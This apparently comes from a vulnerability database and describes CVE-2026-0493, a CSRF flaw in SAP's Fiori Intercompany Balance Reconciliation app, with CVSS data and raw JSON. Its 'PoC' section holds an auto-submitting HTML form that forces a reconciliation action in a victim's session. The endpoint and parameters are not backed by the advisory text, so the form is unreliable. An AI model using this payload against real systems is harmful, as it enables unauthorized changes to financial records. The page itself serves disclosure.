Security Vulnerability Report
CVE-2026-0493 CVSS 4.3 MEDIUM

CVE-2026-0493

Published: 2026-01-13 02:15:51
Last Modified: 2026-04-15 00:35:42

Description

Due to a Cross-Site Request Forgery (CSRF) vulnerability in SAP Fiori App Intercompany Balance Reconciliation, an attacker could execute state-changing actions using an inappropriate request type. This deviation from expected request semantics may allow an attacker to trigger unintended actions on behalf of an authenticated user, causing low impact on the integrity of the system. This has no impact on confidentiality and availability.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

SAP Fiori App Intercompany Balance Reconciliation (FCI_RECONCILE) - for the specific affected versions, refer to SAP's official security note
SAP Fiori Front-End Server - specific versions affected

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- CSRF PoC for CVE-2026-0493 -->
<html>
<body>
<h1>CSRF Attack - SAP Fiori Intercompany Balance Reconciliation</h1>
<p>This PoC demonstrates CSRF vulnerability in SAP Fiori App.</p>
<form id="csrfForm" action="https://[SAP_HOST]/sap/bc/ui5_ui5/sap/FCI_RECONCILE/executeAction" method="POST" enctype="application/x-www-form-urlencoded">
  <input type="hidden" name="action" value="executeReconciliation" />
  <input type="hidden" name="companyCodeFrom" value="1000" />
  <input type="hidden" name="companyCodeTo" value="2000" />
  <input type="hidden" name="fiscalYear" value="2026" />
  <input type="hidden" name="period" value="01" />
  <input type="hidden" name="amount" value="999999.99" />
  <input type="hidden" name="currency" value="USD" />
  <input type="hidden" name="csrf_token" value="" />
</form>
<script>
document.getElementById('csrfForm').submit();
</script>
</body>
</html>

References

https://me.sap.com/notes/3655229
https://url.sap/sapsecuritypatchday

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-0493",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-13T02:15:51.420",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {"lang": "en", "value": "Due to a Cross-Site Request Forgery (CSRF) vulnerability in SAP Fiori App Intercompany Balance Reconciliation an attacker could execute state-changing actions using an inappropriate request type, this deviation from expected request semantics may allow an attacker to trigger unintended actions on behalf of an authenticated user causing low impact on integrity of the system. This has no impact on confidentiality and availability."},
      {"lang": "es", "value": "Debido a una vulnerabilidad de falsificación de petición en sitios cruzados (CSRF) en la aplicación SAP Fiori Intercompany Balance Reconciliation, un atacante podría ejecutar acciones que cambian el estado utilizando un tipo de petición inapropiado, esta desviación de la semántica de petición esperada podría permitir a un atacante desencadenar acciones no intencionadas en nombre de un usuario autenticado causando bajo impacto en la integridad del sistema. Esto no tiene impacto en la confidencialidad y disponibilidad."}
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
            "baseScore": 4.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-352"}]}
    ],
    "references": [
      {"url": "https://me.sap.com/notes/3655229", "source": "[email protected]"},
      {"url": "https://url.sap/sapsecuritypatchday", "source": "[email protected]"}
    ]
  }
}